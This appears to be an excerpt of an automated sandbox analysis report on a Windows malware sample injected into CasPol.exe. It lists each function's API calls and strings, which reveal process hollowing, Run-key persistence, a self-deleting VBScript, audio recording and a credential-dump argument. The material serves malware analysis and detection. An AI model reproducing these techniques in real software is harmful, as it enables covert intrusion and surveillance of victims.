                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                              • ReadProcessMemory.KERNEL32 ref: 004173C0
                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                              • WriteProcessMemory.KERNEL32 ref: 00417558
                                                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                              • API String ID: 4188446516-3035715614
                                                                                                              • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                              • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                              Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00412679
                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32 ref: 00412692
                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041135B
                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041137C
                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?), ref: 00412809
                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 004113B3
                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0041140F
                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                                                                • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000), ref: 0041B5FF
                                                                                                                • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004114EB
                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041B5CE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                              • API String ID: 4250697656-2665858469
                                                                                                              • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                              • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                                                                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                              Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32 ref: 0040AFD5
                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041B5CE
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                              • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                              • API String ID: 1861856835-3168347843
                                                                                                              • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                                                                              • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                              • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                                                                              • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                              Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32 ref: 0040AFD5
                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                              • API String ID: 3797177996-1998216422
                                                                                                              • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                              • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                              Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 0041A2FF
                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                              • API String ID: 738084811-1408154895
                                                                                                              • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                              • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                              Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                              • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                              • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                              • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$Write$Create
                                                                                                              • String ID: RIFF$WAVE$data$fmt
                                                                                                              • API String ID: 1602526932-4212202414
                                                                                                              • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                              • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                              • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                              • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                              Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                              • API String ID: 1646373207-165202446
                                                                                                              • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                              • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                              • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                              • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                              Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _wcslen.LIBCMT ref: 0040BC75
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                              • CopyFileW.KERNEL32 ref: 0040BD3E
                                                                                                              • _wcslen.LIBCMT ref: 0040BD54
                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                              • CopyFileW.KERNEL32 ref: 0040BDF2
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                              • _wcslen.LIBCMT ref: 0040BE34
                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                              • CloseHandle.KERNEL32 ref: 0040BE9B
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                              • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                              • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$open$BG$BG
                                                                                                              • API String ID: 1579085052-1280438975
                                                                                                              • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                                                              • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                              • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                                                                              • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                              Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                              • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                              • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                              • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                              • GetLastError.KERNEL32 ref: 0041B313
                                                                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                              • GetLastError.KERNEL32 ref: 0041B370
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                              • String ID: ?
                                                                                                              • API String ID: 3941738427-1684325040
                                                                                                              • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                              • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                              • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                              • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                              Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9), ref: 004176CC
                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF), ref: 004176D5
                                                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                              • API String ID: 1223786279-3931108886
                                                                                                              • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                                              • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                              • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                                              • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                              Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                              • API String ID: 2490988753-744132762
                                                                                                              • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                              • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                              • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                              • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
